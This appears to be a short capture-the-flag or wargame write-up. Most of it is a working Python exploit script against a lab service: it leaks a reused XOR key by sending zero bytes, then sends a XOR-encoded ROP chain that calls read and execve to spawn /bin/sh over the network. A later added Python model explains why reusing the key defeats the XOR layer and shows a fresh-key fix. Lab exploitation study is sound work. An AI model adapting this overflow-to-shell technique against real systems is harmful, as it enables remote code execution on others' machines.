2016.04.20 21:43


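I did a bit of pointless digging in the wrong place partway through. I've heard it's complete hell from level03 onward, but I don't know how it will turn out..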

from SunKn0wn import *

r = remote('192.168.179.151', 20002)

read_plt = 0x08048860
execve_plt = 0x080489b0
bss = 0x0804b420
pppr = 0x80499bd    # pop; pop; pop; ret gadget

############ get xor key ############
r.recvsend('E')
r.send('\x80\x00\x00\x00')    # length field: 0x80, little-endian
r.send('\x00' * 0x80)         # zero bytes XOR key == key
r.recvuntil('--]\n\x80\x00\x00\x00')
xorkey = r.recv(0x80)
print "[*]Get xor key success!"

############ payload ############
payload = 'A' * 0x20010       # padding up to the saved return address
# read(0, bss, 8): reads "/bin/sh\x00" into .bss
payload += p32(read_plt)
payload += p32(pppr)          # return here to pop the three read() arguments
payload += p32(0)
payload += p32(bss)
payload += p32(8)
# execve(bss, 0, 0)
payload += p32(execve_plt)
payload += 'AAAA'             # dummy return address
payload += p32(bss)
payload += p32(0)
payload += p32(0)
# XOR the payload with the recovered key before sending it
realpayload = ''
cnt = 0
for i in payload:
    realpayload += chr(ord(i) ^ ord(xorkey[cnt % 0x80]))
    cnt += 1

############ attack ############
r.recvsend('E')
r.send(p32(len(realpayload)))
r.send(realpayload)
sleep(0.2)
r.recvsend('Q')
r.send("/bin/sh\x00")
r.interactive()
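
The key-recovery step in the script above works because XOR with a zero byte returns the key byte unchanged, and the same key is still in use on the next request. The following Python 3 model is an added example, not code from the original post or from the target service; `ReusedKeyService`, `FreshKeyService` and the helper names are hypothetical, and the service is assumed to XOR its input with a 0x80-byte repeating key, as the script's `xorkey[cnt % 0x80]` loop implies.

```python
import os

KEY_LEN = 0x80  # key length used by the script above


class ReusedKeyService:
    """Toy model (assumption): one random key, reused for every request."""

    def __init__(self):
        self.key = os.urandom(KEY_LEN)

    def process(self, data: bytes) -> bytes:
        return bytes(b ^ self.key[i % KEY_LEN] for i, b in enumerate(data))


class FreshKeyService:
    """Hardened toy variant (assumption): a new random key per request."""

    def process(self, data: bytes) -> bytes:
        key = os.urandom(KEY_LEN)
        return bytes(b ^ key[i % KEY_LEN] for i, b in enumerate(data))


def learn_key(service) -> bytes:
    # x ^ 0 == x, so the reply to an all-zero block is the key itself.
    return service.process(b"\x00" * KEY_LEN)


def pre_xor(data: bytes, key: bytes) -> bytes:
    # Same transform as the realpayload loop in the script above.
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def survives_transform(service, chosen: bytes) -> bool:
    """True if a client can make the service's output equal `chosen`."""
    key = learn_key(service)
    return service.process(pre_xor(chosen, key)) == chosen


if __name__ == "__main__":
    marker = b"constructed test marker " * 8  # constructed sample input
    print("reused key:", survives_transform(ReusedKeyService(), marker))
    print("fresh key :", survives_transform(FreshKeyService(), marker))
```

With a reused key the client fully controls the bytes that come out of the transform, so the XOR layer adds no protection to whatever consumes that output; with a fresh key per request the value learned from the zero block is useless for the next one.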